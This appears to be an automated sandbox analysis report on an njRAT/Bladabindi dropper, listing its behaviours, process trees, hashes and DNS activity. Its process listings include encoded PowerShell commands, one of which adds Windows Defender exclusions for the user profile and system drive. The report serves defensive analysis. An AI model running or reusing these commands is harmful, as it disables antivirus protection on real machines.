Analysis Overview
SHA256: ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a
Threat Level: Known bad
The file filetest.exe was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Checks computer location settings
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Analysis: static1
Detonation Overview
Reported: 2024-09-07 05:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-09-07 05:24
Reported: 2024-09-07 05:27
Platform: win7-20240903-en
Max time kernel: 135s
Max time network: 122s
Command Line
Signatures
njRAT/Bladabindi
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\filetest.exe
"C:\Users\Admin\AppData\Local\Temp\filetest.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\nudes
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\nudes"
Network
Files
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | fa9439d61c3c28bb92a75095cf39d6bc |
| SHA1 | a959b37a215b1417e72fb7df722e9cecd8f29629 |
| SHA256 | 5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8 |
| SHA512 | 49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c5f82a5a8c32ae47d34dd2a264e1e2af |
| SHA1 | 10a4b3342dc484358c88c9c45b41f82f69a3febf |
| SHA256 | 687d68db1da41b26737410a8067cdcff005e65a5c3ae6e7fa519bab9f5a3299f |
| SHA512 | 104e1968bb0a3e1866c91836c95e9764501aa31210f1d5ce9316447cebe45fbd299a3d851b5f37b60662c6da30a633711eb068a4f07390e0f5d9da2970801fbe |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 12a21f0ce198028be6e5d7b8b252db20 |
| SHA1 | af8abee61c93097d53f950139cad28e8ed0c2ede |
| SHA256 | 2e39f331acbfe2b6f106c7a373f64b1b635e6542a6b5f626b17468e5dc58c4c0 |
| SHA512 | ee23c4c4ca8f8ef50931ba2c95cb7bef15cce116fc10a75759b8b8fad69cba204a998cc47407c9bd2b1266b53203cef0457c620b38a5f04e62219ee973cce32c |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-09-07 05:24
Reported: 2024-09-07 05:27
Platform: win10v2004-20240802-en
Max time kernel: 93s
Max time network: 143s
Command Line
Signatures
njRAT/Bladabindi
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\filetest.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\filetest.exe
"C:\Users\Admin\AppData\Local\Temp\filetest.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\nudes
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guzpaa3r.1do.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | fa9439d61c3c28bb92a75095cf39d6bc |
| SHA1 | a959b37a215b1417e72fb7df722e9cecd8f29629 |
| SHA256 | 5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8 |
| SHA512 | 49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 614f88cf39eb3223246afec4bf1463b4 |
| SHA1 | 74d738ee6fdada75ac1ef1645073005e3f6b6cfb |
| SHA256 | 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd |
| SHA512 | 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4b90550f375afbfd1b52d0731e835b52 |
| SHA1 | e07b218b14743ada74fb88d4109c7acaa83e5e07 |
| SHA256 | 61787abb9fc57fdae394e0d5c15470ff78c4b97b9ebd77cd8ca1019c13a0c403 |
| SHA512 | a91918a888cdddc5d73c638d59276060461df2eee1b99d72f1c9478fd7888d3a8552ca6fdcdc219fa6e3b206c3ca32043ac1e64dcacb0a3b4bbb6820bc69718b |